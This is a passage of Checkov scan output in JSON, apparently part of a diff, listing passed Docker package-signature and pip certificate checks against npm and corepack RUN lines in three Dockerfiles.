"hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_10", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "435bba968d1d0b4c410ea33851637829a16b2ad878f0b9531a737c7a444f91b9" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_7", + "bc_check_id": null, + "check_name": "Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm ci --no-fund --no-audit\n", + "value": "npm ci --no-fund --no-audit", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "57abb1bbe03890ab19f47e5f96b9cbcee02aab65f6980d523df42faf41b709fa" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm ci --no-fund --no-audit\n" + ] + ], + "file_path": "/Dockerfile.dev", + "file_abs_path": "/scan/Dockerfile.dev", + "repo_file_path": "/Dockerfile.dev", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.dev.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "dbd32b6bad6b728919787011f82d60c50d7b2d1c079f814de2b1640696c98816" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 20, + "__endline__": 20, + "resource_type": "RUN", + "hash": "6979b14e6a853ac150ffef85c5e28fd49c956054ea2cb1d01440e13b17260c4a" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 21, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 21, + 21 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run db:generate\n", + "value": "npm run db:generate", + "__startline__": 21, + "__endline__": 21, + "resource_type": "RUN", + "hash": "c1f9cc0c42260bb0183d7e7b9ec2edab99837111ad42dbbdd7fad09ff3e37ab0" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 22, + "RUN npm run db:generate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 22, + 22 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm run build\n", + "value": "npm run build", + "__startline__": 22, + "__endline__": 22, + "resource_type": "RUN", + "hash": "1bf185fb6038f1b491f2a2686de4dd9869ccdd9c3e34d2772cf43bd368377aa6" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 23, + "RUN npm run build\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 23, + 23 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.production", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 30, + "__endline__": 30, + "resource_type": "RUN", + "hash": "01c88e306f7db45ae7136e3bdb63c4b15978dd024f6ed18210961fc3db3df382" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 31, + 31 + ], + "resource": "/Dockerfile.production.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n", + "value": "corepack enable && corepack prepare npm@10.5.0 --activate", + "__startline__": 4, + "__endline__": 4, + "resource_type": "RUN", + "hash": "1d5fb0a211498b8baf37e5744578ad03459da7798534298981f23fdefb7eb757" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 5, + 5 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.test", + "config_": { + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install\n", + "value": "npm install", + "__startline__": 10, + "__endline__": 10, + "resource_type": "RUN", + "hash": "fb809e4860a3131df821aea9480445cc6e2f66dd52744dab5f3d2ef5b2848436" + }, + "evaluated_keys": [ + "value" + ] + }, + "code_block": [ + [ + 11, + "RUN npm install\n" + ] + ], + "file_path": "/Dockerfile.test", + "file_abs_path": "/scan/Dockerfile.test", + "repo_file_path": "/Dockerfile.test", + "file_line_range": [ + 11, + 11 + ], + "resource": "/Dockerfile.test.RUN", + "evaluations": null, + "check_class": "checkov.common.graph.checks_infra.base_check", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV2_DOCKER_4", + "bc_check_id": null, + "check_name": "Ensure that certificate validation isn't disabled with the pip '--trusted-host' option", + "check_result": { + "result": "PASSED", + "entity": { + "block_name_": "RUN", + "block_type_": "resource", + "file_path_": "/Dockerfile.dev", + "config_": { + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund --no-audit", + "__startline__": 4, + "__endline__": 4 + }, + "label_": "resource: RUN", + "id_": "RUN", + "source_": "Dockerfile", + "content": "RUN npm install -g npm@10.5.0 --no-fund --no-audit\n", + "value": "npm install -g npm@10.5.0 --no-fund 